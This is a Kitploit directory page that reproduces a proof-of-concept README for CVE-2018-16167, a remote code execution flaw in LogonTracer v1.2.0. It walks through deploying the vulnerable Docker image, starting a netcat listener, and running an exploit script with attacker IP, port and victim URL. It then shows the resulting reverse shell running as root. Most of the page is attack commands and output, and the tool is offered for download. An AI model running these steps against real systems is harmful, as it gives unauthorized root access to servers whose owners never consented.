Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-16167 — LogonTracer v1.2.0 RCE | Kitploit
Tools/GitHubGitHub/dnr6419/cve-2018-16167
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubdnr6419/cve-2018-16167

CVE-2018-16167

LogonTracer v1.2.0 RCE

View Repository
5 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Installation and Execution Sequence

0. LogonTracer Installation

Download the logontracer version 1.2.0, where a vulnerability was found, from dockerhub.

root@kitploit:~
 $docker pull jpcertcc/docker-logontracer:v1.2.0 

1. LogonTracer Execution

Launch it in a container with the following command.

root@kitploit:~
 $docker run \
   --detach \
   --publish=7474:7474 --publish=7687:7687 --publish=8080:8080 \
   -e LTHOSTNAME=[IP_ADDR] \
   jpcertcc/docker-logontracer:v1.2.0

2. Netcat on the host to obtain a shell

Open a specific port on the host that will receive the shell using netcat.

root@kitploit:~
 
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp {attacker_port}
listening on [any] 8888 ...

3. Execute the Exploit Code

Run the exploit code.

root@kitploit:~
 
dnr6419@DESKTOP-4CJA7LD ~/docker/logon
☺  python3 go.py {attacker_ip} {attacker_port} http://{victime_ip}:8080

Execution Results

As shown in the figure below, you can see that the exploit code ran successfully and a remote shell was obtained.

root@kitploit:~
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp 8888
listening on [any] 8888 ...
192.168.56.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.103] 41858: NO_DATA
/usr/local/src/LogonTracer # ^[[16;30Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/usr/local/src/LogonTracer # ^[[20;30R

image

Download Tool